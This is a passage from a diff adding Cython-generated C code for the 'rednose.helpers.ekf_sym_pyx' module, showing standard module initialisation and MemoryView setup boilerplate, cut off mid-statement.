(void*)__pyx_pymod_exec_ekf_sym_pyx}, + {0, NULL} +}; +#endif + +#ifdef __cplusplus +namespace { + struct PyModuleDef __pyx_moduledef = + #else + static struct PyModuleDef __pyx_moduledef = + #endif + { + PyModuleDef_HEAD_INIT, + "ekf_sym_pyx", + 0, /* m_doc */ + #if CYTHON_PEP489_MULTI_PHASE_INIT + 0, /* m_size */ + #elif CYTHON_USE_MODULE_STATE + sizeof(__pyx_mstate), /* m_size */ + #else + -1, /* m_size */ + #endif + __pyx_methods /* m_methods */, + #if CYTHON_PEP489_MULTI_PHASE_INIT + __pyx_moduledef_slots, /* m_slots */ + #else + NULL, /* m_reload */ + #endif + #if CYTHON_USE_MODULE_STATE + __pyx_m_traverse, /* m_traverse */ + __pyx_m_clear, /* m_clear */ + NULL /* m_free */ + #else + NULL, /* m_traverse */ + NULL, /* m_clear */ + NULL /* m_free */ + #endif + }; + #ifdef __cplusplus +} /* anonymous namespace */ +#endif +#endif + +#ifndef CYTHON_NO_PYINIT_EXPORT +#define __Pyx_PyMODINIT_FUNC PyMODINIT_FUNC +#elif PY_MAJOR_VERSION < 3 +#ifdef __cplusplus +#define __Pyx_PyMODINIT_FUNC extern "C" void +#else +#define __Pyx_PyMODINIT_FUNC void +#endif +#else +#ifdef __cplusplus +#define __Pyx_PyMODINIT_FUNC extern "C" PyObject * +#else +#define __Pyx_PyMODINIT_FUNC PyObject * +#endif +#endif + + +#if PY_MAJOR_VERSION < 3 +__Pyx_PyMODINIT_FUNC initekf_sym_pyx(void) CYTHON_SMALL_CODE; /*proto*/ +__Pyx_PyMODINIT_FUNC initekf_sym_pyx(void) +#else +__Pyx_PyMODINIT_FUNC PyInit_ekf_sym_pyx(void) CYTHON_SMALL_CODE; /*proto*/ +__Pyx_PyMODINIT_FUNC PyInit_ekf_sym_pyx(void) +#if CYTHON_PEP489_MULTI_PHASE_INIT +{ + return PyModuleDef_Init(&__pyx_moduledef); +} +static CYTHON_SMALL_CODE int __Pyx_check_single_interpreter(void) { + #if PY_VERSION_HEX >= 0x030700A1 + static PY_INT64_T main_interpreter_id = -1; + PY_INT64_T current_id = PyInterpreterState_GetID(PyThreadState_Get()->interp); + if (main_interpreter_id == -1) { + main_interpreter_id = current_id; + return (unlikely(current_id == -1)) ? -1 : 0; + } else if (unlikely(main_interpreter_id != current_id)) + #else + static PyInterpreterState *main_interpreter = NULL; + PyInterpreterState *current_interpreter = PyThreadState_Get()->interp; + if (!main_interpreter) { + main_interpreter = current_interpreter; + } else if (unlikely(main_interpreter != current_interpreter)) + #endif + { + PyErr_SetString( + PyExc_ImportError, + "Interpreter change detected - this module can only be loaded into one interpreter per process."); + return -1; + } + return 0; +} +#if CYTHON_COMPILING_IN_LIMITED_API +static CYTHON_SMALL_CODE int __Pyx_copy_spec_to_module(PyObject *spec, PyObject *module, const char* from_name, const char* to_name, int allow_none) +#else +static CYTHON_SMALL_CODE int __Pyx_copy_spec_to_module(PyObject *spec, PyObject *moddict, const char* from_name, const char* to_name, int allow_none) +#endif +{ + PyObject *value = PyObject_GetAttrString(spec, from_name); + int result = 0; + if (likely(value)) { + if (allow_none || value != Py_None) { +#if CYTHON_COMPILING_IN_LIMITED_API + result = PyModule_AddObject(module, to_name, value); +#else + result = PyDict_SetItemString(moddict, to_name, value); +#endif + } + Py_DECREF(value); + } else if (PyErr_ExceptionMatches(PyExc_AttributeError)) { + PyErr_Clear(); + } else { + result = -1; + } + return result; +} +static CYTHON_SMALL_CODE PyObject* __pyx_pymod_create(PyObject *spec, PyModuleDef *def) { + PyObject *module = NULL, *moddict, *modname; + CYTHON_UNUSED_VAR(def); + if (__Pyx_check_single_interpreter()) + return NULL; + if (__pyx_m) + return __Pyx_NewRef(__pyx_m); + modname = PyObject_GetAttrString(spec, "name"); + if (unlikely(!modname)) goto bad; + module = PyModule_NewObject(modname); + Py_DECREF(modname); + if (unlikely(!module)) goto bad; +#if CYTHON_COMPILING_IN_LIMITED_API + moddict = module; +#else + moddict = PyModule_GetDict(module); + if (unlikely(!moddict)) goto bad; +#endif + if (unlikely(__Pyx_copy_spec_to_module(spec, moddict, "loader", "__loader__", 1) < 0)) goto bad; + if (unlikely(__Pyx_copy_spec_to_module(spec, moddict, "origin", "__file__", 1) < 0)) goto bad; + if (unlikely(__Pyx_copy_spec_to_module(spec, moddict, "parent", "__package__", 1) < 0)) goto bad; + if (unlikely(__Pyx_copy_spec_to_module(spec, moddict, "submodule_search_locations", "__path__", 0) < 0)) goto bad; + return module; +bad: + Py_XDECREF(module); + return NULL; +} + + +static CYTHON_SMALL_CODE int __pyx_pymod_exec_ekf_sym_pyx(PyObject *__pyx_pyinit_module) +#endif +#endif +{ + int stringtab_initialized = 0; + #if CYTHON_USE_MODULE_STATE + int pystate_addmodule_run = 0; + #endif + __Pyx_TraceDeclarations + PyObject *__pyx_t_1 = NULL; + PyObject *__pyx_t_2 = NULL; + PyObject *__pyx_t_3 = NULL; + PyObject *__pyx_t_4 = NULL; + PyObject *__pyx_t_5 = NULL; + int __pyx_t_6; + PyObject *__pyx_t_7 = NULL; + static PyThread_type_lock __pyx_t_8[8]; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannyDeclarations + #if CYTHON_PEP489_MULTI_PHASE_INIT + if (__pyx_m) { + if (__pyx_m == __pyx_pyinit_module) return 0; + PyErr_SetString(PyExc_RuntimeError, "Module 'ekf_sym_pyx' has already been imported. Re-initialisation is not supported."); + return -1; + } + #elif PY_MAJOR_VERSION >= 3 + if (__pyx_m) return __Pyx_NewRef(__pyx_m); + #endif + /*--- Module creation code ---*/ + #if CYTHON_PEP489_MULTI_PHASE_INIT + __pyx_m = __pyx_pyinit_module; + Py_INCREF(__pyx_m); + #else + #if PY_MAJOR_VERSION < 3 + __pyx_m = Py_InitModule4("ekf_sym_pyx", __pyx_methods, 0, 0, PYTHON_API_VERSION); Py_XINCREF(__pyx_m); + if (unlikely(!__pyx_m)) __PYX_ERR(0, 1, __pyx_L1_error) + #elif CYTHON_USE_MODULE_STATE + __pyx_t_1 = PyModule_Create(&__pyx_moduledef); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1, __pyx_L1_error) + { + int add_module_result = PyState_AddModule(__pyx_t_1, &__pyx_moduledef); + __pyx_t_1 = 0; /* transfer ownership from __pyx_t_1 to ekf_sym_pyx pseudovariable */ + if (unlikely((add_module_result < 0))) __PYX_ERR(0, 1, __pyx_L1_error) + pystate_addmodule_run = 1; + } + #else + __pyx_m = PyModule_Create(&__pyx_moduledef); + if (unlikely(!__pyx_m)) __PYX_ERR(0, 1, __pyx_L1_error) + #endif + #endif + CYTHON_UNUSED_VAR(__pyx_t_1); + __pyx_d = PyModule_GetDict(__pyx_m); if (unlikely(!__pyx_d)) __PYX_ERR(0, 1, __pyx_L1_error) + Py_INCREF(__pyx_d); + __pyx_b = PyImport_AddModule(__Pyx_BUILTIN_MODULE_NAME); if (unlikely(!__pyx_b)) __PYX_ERR(0, 1, __pyx_L1_error) + Py_INCREF(__pyx_b); + __pyx_cython_runtime = PyImport_AddModule((char *) "cython_runtime"); if (unlikely(!__pyx_cython_runtime)) __PYX_ERR(0, 1, __pyx_L1_error) + Py_INCREF(__pyx_cython_runtime); + if (PyObject_SetAttrString(__pyx_m, "__builtins__", __pyx_b) < 0) __PYX_ERR(0, 1, __pyx_L1_error) + #if CYTHON_REFNANNY +__Pyx_RefNanny = __Pyx_RefNannyImportAPI("refnanny"); +if (!__Pyx_RefNanny) { + PyErr_Clear(); + __Pyx_RefNanny = __Pyx_RefNannyImportAPI("Cython.Runtime.refnanny"); + if (!__Pyx_RefNanny) + Py_FatalError("failed to import 'refnanny' module"); +} +#endif + __Pyx_RefNannySetupContext("__Pyx_PyMODINIT_FUNC PyInit_ekf_sym_pyx(void)", 0); + if (__Pyx_check_binary_version() < 0) __PYX_ERR(0, 1, __pyx_L1_error) + #ifdef __Pxy_PyFrame_Initialize_Offsets + __Pxy_PyFrame_Initialize_Offsets(); + #endif + __pyx_empty_tuple = PyTuple_New(0); if (unlikely(!__pyx_empty_tuple)) __PYX_ERR(0, 1, __pyx_L1_error) + __pyx_empty_bytes = PyBytes_FromStringAndSize("", 0); if (unlikely(!__pyx_empty_bytes)) __PYX_ERR(0, 1, __pyx_L1_error) + __pyx_empty_unicode = PyUnicode_FromStringAndSize("", 0); if (unlikely(!__pyx_empty_unicode)) __PYX_ERR(0, 1, __pyx_L1_error) + #ifdef __Pyx_CyFunction_USED + if (__pyx_CyFunction_init(__pyx_m) < 0) __PYX_ERR(0, 1, __pyx_L1_error) + #endif + #ifdef __Pyx_FusedFunction_USED + if (__pyx_FusedFunction_init(__pyx_m) < 0) __PYX_ERR(0, 1, __pyx_L1_error) + #endif + #ifdef __Pyx_Coroutine_USED + if (__pyx_Coroutine_init(__pyx_m) < 0) __PYX_ERR(0, 1, __pyx_L1_error) + #endif + #ifdef __Pyx_Generator_USED + if (__pyx_Generator_init(__pyx_m) < 0) __PYX_ERR(0, 1, __pyx_L1_error) + #endif + #ifdef __Pyx_AsyncGen_USED + if (__pyx_AsyncGen_init(__pyx_m) < 0) __PYX_ERR(0, 1, __pyx_L1_error) + #endif + #ifdef __Pyx_StopAsyncIteration_USED + if (__pyx_StopAsyncIteration_init(__pyx_m) < 0) __PYX_ERR(0, 1, __pyx_L1_error) + #endif + /*--- Library function declarations ---*/ + /*--- Threads initialization code ---*/ + #if defined(WITH_THREAD) && PY_VERSION_HEX < 0x030700F0 && defined(__PYX_FORCE_INIT_THREADS) && __PYX_FORCE_INIT_THREADS + PyEval_InitThreads(); + #endif + /*--- Initialize various global constants etc. ---*/ + if (__Pyx_InitConstants() < 0) __PYX_ERR(0, 1, __pyx_L1_error) + stringtab_initialized = 1; + if (__Pyx_InitGlobals() < 0) __PYX_ERR(0, 1, __pyx_L1_error) + #if PY_MAJOR_VERSION < 3 && (__PYX_DEFAULT_STRING_ENCODING_IS_ASCII || __PYX_DEFAULT_STRING_ENCODING_IS_DEFAULT) + if (__Pyx_init_sys_getdefaultencoding_params() < 0) __PYX_ERR(0, 1, __pyx_L1_error) + #endif + if (__pyx_module_is_main_rednose__helpers__ekf_sym_pyx) { + if (PyObject_SetAttr(__pyx_m, __pyx_n_s_name_2, __pyx_n_s_main) < 0) __PYX_ERR(0, 1, __pyx_L1_error) + } + #if PY_MAJOR_VERSION >= 3 + { + PyObject *modules = PyImport_GetModuleDict(); if (unlikely(!modules)) __PYX_ERR(0, 1, __pyx_L1_error) + if (!PyDict_GetItemString(modules, "rednose.helpers.ekf_sym_pyx")) { + if (unlikely((PyDict_SetItemString(modules, "rednose.helpers.ekf_sym_pyx", __pyx_m) < 0))) __PYX_ERR(0, 1, __pyx_L1_error) + } + } + #endif + /*--- Builtin init code ---*/ + if (__Pyx_InitCachedBuiltins() < 0) __PYX_ERR(0, 1, __pyx_L1_error) + /*--- Constants init code ---*/ + if (__Pyx_InitCachedConstants() < 0) __PYX_ERR(0, 1, __pyx_L1_error) + /*--- Global type/function init code ---*/ + (void)__Pyx_modinit_global_init_code(); + (void)__Pyx_modinit_variable_export_code(); + (void)__Pyx_modinit_function_export_code(); + if (unlikely((__Pyx_modinit_type_init_code() < 0))) __PYX_ERR(0, 1, __pyx_L1_error) + if (unlikely((__Pyx_modinit_type_import_code() < 0))) __PYX_ERR(0, 1, __pyx_L1_error) + (void)__Pyx_modinit_variable_import_code(); + (void)__Pyx_modinit_function_import_code(); + /*--- Execution code ---*/ + #if defined(__Pyx_Generator_USED) || defined(__Pyx_Coroutine_USED) + if (__Pyx_patch_abc() < 0) __PYX_ERR(0, 1, __pyx_L1_error) + #endif + __Pyx_TraceCall("__Pyx_PyMODINIT_FUNC PyInit_ekf_sym_pyx(void)", __pyx_f[0], 1, 0, __PYX_ERR(0, 1, __pyx_L1_error)); + + /* "View.MemoryView":99 + * + * cdef object __pyx_collections_abc_Sequence "__pyx_collections_abc_Sequence" + * try: # <<<<<<<<<<<<<< + * if __import__("sys").version_info >= (3, 3): + * __pyx_collections_abc_Sequence = __import__("collections.abc").abc.Sequence + */ + { + __Pyx_PyThreadState_declare + __Pyx_PyThreadState_assign + __Pyx_ExceptionSave(&__pyx_t_1, &__pyx_t_2, &__pyx_t_3); + __Pyx_XGOTREF(__pyx_t_1); + __Pyx_XGOTREF(__pyx_t_2); + __Pyx_XGOTREF(__pyx_t_3); + /*try:*/ { + + /* "View.MemoryView":100 + * cdef object __pyx_collections_abc_Sequence "__pyx_collections_abc_Sequence" + * try: + * if __import__("sys").version_info >= (3, 3): # <<<<<<<<<<<<<< + * __pyx_collections_abc_Sequence = __import__("collections.abc").abc.Sequence + * else: + */ + __pyx_t_4 = __Pyx_PyObject_Call(__pyx_builtin___import__, __pyx_tuple__37, NULL); if (unlikely(!__pyx_t_4)) __PYX_ERR(1, 100, __pyx_L2_error) + __Pyx_GOTREF(__pyx_t_4); + __pyx_t_5 = __Pyx_PyObject_GetAttrStr(__pyx_t_4, __pyx_n_s_version_info); if (unlikely(!__pyx_t_5)) __PYX_ERR(1, 100, __pyx_L2_error) + __Pyx_GOTREF(__pyx_t_5); + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + __pyx_t_4 = PyObject_RichCompare(__pyx_t_5, __pyx_tuple__38, Py_GE); __Pyx_XGOTREF(__pyx_t_4); if (unlikely(!__pyx_t_4)) __PYX_ERR(1, 100, __pyx_L2_error) + __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; + __pyx_t_6 = __Pyx_PyObject_IsTrue(__pyx_t_4); if (unlikely((__pyx_t_6 < 0))) __PYX_ERR(1, 100, __pyx_L2_error) + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + if (__pyx_t_6) { + + /* "View.MemoryView":101 + * try: + * if __import__("sys").version_info >= (3, 3): + * __pyx_collections_abc_Sequence = __import__("collections.abc").abc.Sequence # <<<<<<<<<<<<<< + * else: + * __pyx_collections_abc_Sequence = __import__("collections").Sequence + */ + __pyx_t_4 = __Pyx_PyObject_Call(__pyx_builtin___import__, __pyx_tuple__39, NULL); if (unlikely(!__pyx_t_4)) __PYX_ERR(1, 101, __pyx_L2_error) + __Pyx_GOTREF(__pyx_t_4); + __pyx_t_5 = __Pyx_PyObject_GetAttrStr(__pyx_t_4, __pyx_n_s_abc); if (unlikely(!__pyx_t_5)) __PYX_ERR(1, 101, __pyx_L2_error) + __Pyx_GOTREF(__pyx_t_5); + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + __pyx_t_4 = __Pyx_PyObject_GetAttrStr(__pyx_t_5, __pyx_n_s_Sequence); if (unlikely(!__pyx_t_4)) __PYX_ERR(1, 101, __pyx_L2_error) + __Pyx_GOTREF(__pyx_t_4); + __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; + __Pyx_XGOTREF(__pyx_collections_abc_Sequence); + __Pyx_DECREF_SET(__pyx_collections_abc_Sequence, __pyx_t_4); + __Pyx_GIVEREF(__pyx_t_4); + __pyx_t_4 = 0; + + /* "View.MemoryView":100 + * cdef object __pyx_collections_abc_Sequence "__pyx_collections_abc_Sequence" + * try: + * if __import__("sys").version_info >= (3, 3): # <<<<<<<<<<<<<< + * __pyx_collections_abc_Sequence = __import__("collections.abc").abc.Sequence + * else: + */ + goto __pyx_L8; + } + + /* "View.MemoryView":103 + * __pyx_collections_abc_Sequence = __import__("collections.abc").abc.Sequence + * else: + * __pyx_collections_abc_Sequence = __import__("collections").Sequence # <<<<<<<<<<<<<< + * except: + * + */ + /*else*/ { + __pyx_t_4 = __Pyx_PyObject_Call(__pyx_builtin___import__, __pyx_tuple__40, NULL); if (unlikely(!__pyx_t_4)) __PYX_ERR(1, 103, __pyx_L2_error) + __Pyx_GOTREF(__pyx_t_4); + __pyx_t_5 = __Pyx_PyObject_GetAttrStr(__pyx_t_4, __pyx_n_s_Sequence); if (unlikely(!__pyx_t_5)) __PYX_ERR(1, 103, __pyx_L2_error) + __Pyx_GOTREF(__pyx_t_5); + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + __Pyx_XGOTREF(__pyx_collections_abc_Sequence); + __Pyx_DECREF_SET(__pyx_collections_abc_Sequence, __pyx_t_5); + __Pyx_GIVEREF(__pyx_t_5); + __pyx_t_5 = 0; + } + __pyx_L8:; + + /* "View.MemoryView":99 + * + * cdef object __pyx_collections_abc_Sequence "__pyx_collections_abc_Sequence" + * try: # <<<<<<<<<<<<<< + * if __import__("sys").version_info >= (3, 3): + * __pyx_collections_abc_Sequence = __import__("collections.abc").abc.Sequence + */ + } + __Pyx_XDECREF(__pyx_t_1); __pyx_t_1 = 0; + __Pyx_XDECREF(__pyx_t_2); __pyx_t_2 = 0; + __Pyx_XDECREF(__pyx_t_3); __pyx_t_3 = 0; + goto __pyx_L7_try_end; + __pyx_L2_error:; + __Pyx_XDECREF(__pyx_t_4); __pyx_t_4 = 0; + __Pyx_XDECREF(__pyx_t_5); __pyx_t_5 = 0; + + /* "View.MemoryView":104 + * else: + * __pyx_collections_abc_Sequence = __import__("collections").Sequence + * except: # <<<<<<<<<<<<<< + * + * __pyx_collections_abc_Sequence = None + */ + /*except:*/ { + __Pyx_AddTraceback("View.MemoryView", __pyx_clineno, __pyx_lineno, __pyx_filename); + if (__Pyx_GetException(&__pyx_t_5, &__pyx_t_4, &__pyx_t_7) < 0) __PYX_ERR(1, 104, __pyx_L4_except_error) + __Pyx_XGOTREF(__pyx_t_5); + __Pyx_XGOTREF(__pyx_t_4); + __Pyx_XGOTREF(__pyx_t_7); + + /* "View.MemoryView":106 + * except: + * + * __pyx_collections_abc_Sequence = None # <<<<<<<<<<<<<< + * + * + */ + __Pyx_INCREF(Py_None); + __Pyx_XGOTREF(__pyx_collections_abc_Sequence); + __Pyx_DECREF_SET(__pyx_collections_abc_Sequence, Py_None); + __Pyx_GIVEREF(Py_None); + __Pyx_XDECREF(__pyx_t_5); __pyx_t_5 = 0; + __Pyx_XDECREF(__pyx_t_4); __pyx_t_4 = 0; + __Pyx_XDECREF(__pyx_t_7); __pyx_t_7 = 0; + goto __pyx_L3_exception_handled; + } + + /* "View.MemoryView":99 + * + * cdef object __pyx_collections_abc_Sequence "__pyx_collections_abc_Sequence" + * try: # <<<<<<<<<<<<<< + * if __import__("sys").version_info >= (3, 3): + * __pyx_collections_abc_Sequence = __import__("collections.abc").abc.Sequence + */ + __pyx_L4_except_error:; + __Pyx_XGIVEREF(__pyx_t_1); + __Pyx_XGIVEREF(__pyx_t_2); + __Pyx_XGIVEREF(__pyx_t_3); + __Pyx_ExceptionReset(__pyx_t_1, __pyx_t_2, __pyx_t_3); + goto __pyx_L1_error; + __pyx_L3_exception_handled:; + __Pyx_XGIVEREF(__pyx_t_1); + __Pyx_XGIVEREF(__pyx_t_2); + __Pyx_XGIVEREF(__pyx_t_3); + __Pyx_ExceptionReset(__pyx_t_1, __pyx_t_2, __pyx_t_3); + __pyx_L7_try_end:; + } + + /* "View.MemoryView":241 + * + * + * try: # <<<<<<<<<<<<<< + * count = __pyx_collections_abc_Sequence.count + * index = __pyx_collections_abc_Sequence.index + */ + { + __Pyx_PyThreadState_declare + __Pyx_PyThreadState_assign + __Pyx_ExceptionSave(&__pyx_t_3, &__pyx_t_2, &__pyx_t_1); + __Pyx_XGOTREF(__pyx_t_3); + __Pyx_XGOTREF(__pyx_t_2); + __Pyx_XGOTREF(__pyx_t_1); + /*try:*/ { + + /* "View.MemoryView":242 + * + * try: + * count = __pyx_collections_abc_Sequence.count # <<<<<<<<<<<<<< + * index = __pyx_collections_abc_Sequence.index + * except: + */ + __pyx_t_7 = __Pyx_PyObject_GetAttrStr(__pyx_collections_abc_Sequence, __pyx_n_s_count); if (unlikely(!__pyx_t_7)) __PYX_ERR(1, 242, __pyx_L11_error) + __Pyx_GOTREF(__pyx_t_7); + if (PyDict_SetItem(__pyx_array_type->tp_dict, __pyx_n_s_count, __pyx_t_7) < 0) __PYX_ERR(1, 242, __pyx_L11_error) + __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; + PyType_Modified(__pyx_array_type); + + /* "View.MemoryView":243 + * try: + * count = __pyx_collections_abc_Sequence.count + * index = __pyx_collections_abc_Sequence.index # <<<<<<<<<<<<<< + * except: + * pass + */ + __pyx_t_7 = __Pyx_PyObject_GetAttrStr(__pyx_collections_abc_Sequence, __pyx_n_s_index); if (unlikely(!__pyx_t_7)) __PYX_ERR(1, 243, __pyx_L11_error) + __Pyx_GOTREF(__pyx_t_7); + if (PyDict_SetItem(__pyx_array_type->tp_dict, __pyx_n_s_index, __pyx_t_7) < 0) __PYX_ERR(1, 243, __pyx_L11_error) + __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; + PyType_Modified(__pyx_array_type); + + /* "View.MemoryView":241 + * + * + * try: # <<<<<<<<<<<<<< + * count = __pyx_collections_abc_Sequence.count + * index = __pyx_collections_abc_Sequence.index + */ + } + __Pyx_XDECREF(__pyx_t_3); __pyx_t_3 = 0; + __Pyx_XDECREF(__pyx_t_2); __pyx_t_2 = 0; + __Pyx_XDECREF(__pyx_t_1); __pyx_t_1 = 0; + goto __pyx_L16_try_end; + __pyx_L11_error:; + __Pyx_XDECREF(__pyx_t_4); __pyx_t_4 = 0; + __Pyx_XDECREF(__pyx_t_5); __pyx_t_5 = 0; + __Pyx_XDECREF(__pyx_t_7); __pyx_t_7 = 0; + + /* "View.MemoryView":244 + * count = __pyx_collections_abc_Sequence.count + * index = __pyx_collections_abc_Sequence.index + * except: # <<<<<<<<<<<<<< + * pass + * + */ + /*except:*/ { + __Pyx_ErrRestore(0,0,0); + goto __pyx_L12_exception_handled; + } + __pyx_L12_exception_handled:; + __Pyx_XGIVEREF(__pyx_t_3); + __Pyx_XGIVEREF(__pyx_t_2); + __Pyx_XGIVEREF(__pyx_t_1); + __Pyx_ExceptionReset(__pyx_t_3, __pyx_t_2, __pyx_t_1); + __pyx_L16_try_end:; + } + + /* "View.MemoryView":309 + * return self.name + * + * cdef generic = Enum("") # <<<<<<<<<<<<<< + * cdef strided = Enum("") # default + * cdef indirect = Enum("") + */ + __pyx_t_7 = __Pyx_PyObject_Call(((PyObject *)__pyx_MemviewEnum_type), __pyx_tuple__41, NULL); if (unlikely(!__pyx_t_7)) __PYX_ERR(1, 309, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_7); + __Pyx_XGOTREF(generic); + __Pyx_DECREF_SET(generic, __pyx_t_7); + __Pyx_GIVEREF(__pyx_t_7); + __pyx_t_7 = 0; + + /* "View.MemoryView":310 + * + * cdef generic = Enum("") + * cdef strided = Enum("") # default # <<<<<<<<<<<<<< + * cdef indirect = Enum("") + * + */ + __pyx_t_7 = __Pyx_PyObject_Call(((PyObject *)__pyx_MemviewEnum_type), __pyx_tuple__42, NULL); if (unlikely(!__pyx_t_7)) __PYX_ERR(1, 310, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_7); + __Pyx_XGOTREF(strided); + __Pyx_DECREF_SET(strided, __pyx_t_7); + __Pyx_GIVEREF(__pyx_t_7); + __pyx_t_7 = 0; + + /* "View.MemoryView":311 + * cdef generic = Enum("") + * cdef strided = Enum("") # default + * cdef indirect = Enum("") # <<<<<<<<<<<<<< + * + * + */ + __pyx_t_7 = __Pyx_PyObject_Call(((PyObject *)__pyx_MemviewEnum_type), __pyx_tuple__43, NULL); if (unlikely(!__pyx_t_7)) __PYX_ERR(1, 311, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_7); + __Pyx_XGOTREF(indirect); + __Pyx_DECREF_SET(indirect, __pyx_t_7); + __Pyx_GIVEREF(__pyx_t_7); + __pyx_t_7 = 0; + + /* "View.MemoryView":314 + * + * + * cdef contiguous = Enum("") # <<<<<<<<<<<<<< + * cdef indirect_contiguous = Enum("") + * + */ + __pyx_t_7 = __Pyx_PyObject_Call(((PyObject *)__pyx_MemviewEnum_type), __pyx_tuple__44, NULL); if (unlikely(!__pyx_t_7)) __PYX_ERR(1, 314, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_7); + __Pyx_XGOTREF(contiguous); + __Pyx_DECREF_SET(contiguous, __pyx_t_7); + __Pyx_GIVEREF(__pyx_t_7); + __pyx_t_7 = 0; + + /* "View.MemoryView":315 + * + * cdef contiguous = Enum("") + * cdef indirect_contiguous = Enum("") # <<<<<<<<<<<<<< + * + * + */ + __pyx_t_7 = __Pyx_PyObject_Call(((PyObject *)__pyx_MemviewEnum_type), __pyx_tuple__45, NULL); if (unlikely(!__pyx_t_7)) __PYX_ERR(1, 315, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_7); + __Pyx_XGOTREF(indirect_contiguous); + __Pyx_DECREF_SET(indirect_contiguous, __pyx_t_7); + __Pyx_GIVEREF(__pyx_t_7); + __pyx_t_7 = 0; + + /* "View.MemoryView":323 + * + * + * cdef int __pyx_memoryview_thread_locks_used = 0 # <<<<<<<<<<<<<< + * cdef PyThread_type_lock[8] __pyx_memoryview_thread_locks = [ + * PyThread_allocate_lock(), + */ + __pyx_memoryview_thread_locks_used = 0; + + /* "View.MemoryView":324 + * + * cdef int __pyx_memoryview_thread_locks_used = 0 + * cdef PyThread_type_lock[8] __pyx_memoryview_thread_locks = [ # <<<<<<<<<<<<<< + * PyThread_allocate_lock(), + * PyThread_allocate_lock(), + */ + __pyx_t_8[0] = PyThread_allocate_lock(); + __pyx_t_8[1] = PyThread_allocate_lock(); + __pyx_t_8[2] = PyThread_allocate_lock(); + __pyx_t_8[3] = PyThread_allocate_lock(); + __pyx_t_8[4] = PyThread_allocate_lock(); + __pyx_t_8[5] = PyThread_allocate_lock(); + __pyx_t_8[6] = PyThread_allocate_lock(); + __pyx_t_8[7] = PyThread_allocate_lock(); + memcpy(&(__pyx_memoryview_thread_locks[0]), __pyx_t_8, sizeof(__pyx_memoryview_thread_locks[0]) * (8)); + + /* "View.MemoryView":982 + * + * + * try: # <<<<<<<<<<<<<< + * count = __pyx_collections_abc_Sequence.count + * index = __pyx_collections_abc_Sequence.index + */ + { + __Pyx_PyThreadState_declare + __Pyx_PyThreadState_assign + __Pyx_ExceptionSave(&__pyx_t_1, &__pyx_t_2, &__pyx_t_3); + __Pyx_XGOTREF(__pyx_t_1); + __Pyx_XGOTREF(__pyx_t_2); + __Pyx_XGOTREF(__pyx_t_3); + /*try:*/ { + + /* "View.MemoryView":983 + * + * try: + * count = __pyx_collections_abc_Sequence.count # <<<<<<<<<<<<<< + * index = __pyx_collections_abc_Sequence.index + * except: + */ + __pyx_t_7 = __Pyx_PyObject_GetAttrStr(__pyx_collections_abc_Sequence, __pyx_n_s_count); if (unlikely(!__pyx_t_7)) __PYX_ERR(1, 983, __pyx_L17_error) + __Pyx_GOTREF(__pyx_t_7); + if (PyDict_SetItem(__pyx_memoryviewslice_type->tp_dict, __pyx_n_s_count, __pyx_t_7) < 0) __PYX_ERR(1, 983, __pyx_L17_error) + __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; + PyType_Modified(__pyx_memoryviewslice_type); + + /* "View.MemoryView":984 + * try: + * count = __pyx_collections_abc_Sequence.count + * index = __pyx_collections_abc_Sequence.index # <<<<<<<<<<<<<< + * except: + * pass + */ + __pyx_t_7 = __Pyx_PyObject_GetAttrStr(__pyx_collections_abc_Sequence, __pyx_n_s_index); if (unlikely(!__pyx_t_7)) __PYX_ERR(1, 984, __pyx_L17_error) + __Pyx_GOTREF(__pyx_t_7); + if (PyDict_SetItem(__pyx_memoryviewslice_type->tp_dict, __pyx_n_s_index, __pyx_t_7) < 0) __PYX_ERR(1, 984, __pyx_L17_error) + __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; + PyType_Modified(__pyx_memoryviewslice_type); + + /* "View.MemoryView":982 + * + * + * try: # <<<<<<<<<<<<<< + * count = __pyx_collections_abc_Sequence.count + * index = __pyx_collections_abc_Sequence.index + */ + } + __Pyx_XDECREF(__pyx_t_1); __pyx_t_1 = 0; + __Pyx_XDECREF(__pyx_t_2); __pyx_t_2 = 0; + __Pyx_XDECREF(__pyx_t_3); __pyx_t_3 = 0; + goto __pyx_L22_try_end; + __pyx_L17_error:; + __Pyx_XDECREF(__pyx_t_4); __pyx_t_4 = 0; + __Pyx_XDECREF(__pyx_t_5); __pyx_t_5 = 0; + __Pyx_XDECREF(__pyx_t_7); __pyx_t_7 = 0; + + /* "View.MemoryView":985 + * count = __pyx_collections_abc_Sequence.count + * index = __pyx_collections_abc_Sequence.index + * except: # <<<<<<<<<<<<<< + * pass + * + */ + /*except:*/ { + __Pyx_ErrRestore(0,0,0); + goto __pyx_L18_exception_handled; + } + __pyx_L18_exception_handled:; + __Pyx_XGIVEREF(__pyx_t_1); + __Pyx_XGIVEREF(__pyx_t_2); + __Pyx_XGIVEREF(__pyx_t_3); + __Pyx_ExceptionReset(__pyx_t_1, __pyx_t_2, __pyx_t_3); + __pyx_L22_try_end:; + } + + /* "View.MemoryView":988 + * pass + * + * try: # <<<<<<<<<<<<<< + * if __pyx_collections_abc_Sequence: + * + */ + { + __Pyx_PyThreadState_declare + __Pyx_PyThreadState_assign + __Pyx_ExceptionSave(&__pyx_t_3, &__pyx_t_2, &__pyx_t_1); + __Pyx_XGOTREF(__pyx_t_3); + __Pyx_XGOTREF(__pyx_t_2); + __Pyx_XGOTREF(__pyx_t_1); + /*try:*/ { + + /* "View.MemoryView":989 + * + * try: + * if __pyx_collections_abc_Sequence: # <<<<<<<<<<<<<< + * + * + */ + __pyx_t_6 = __Pyx_PyObject_IsTrue(__pyx_collections_abc_Sequence); if (unlikely((__pyx_t_6 < 0))) __PYX_ERR(1, 989, __pyx_L23_error) + if 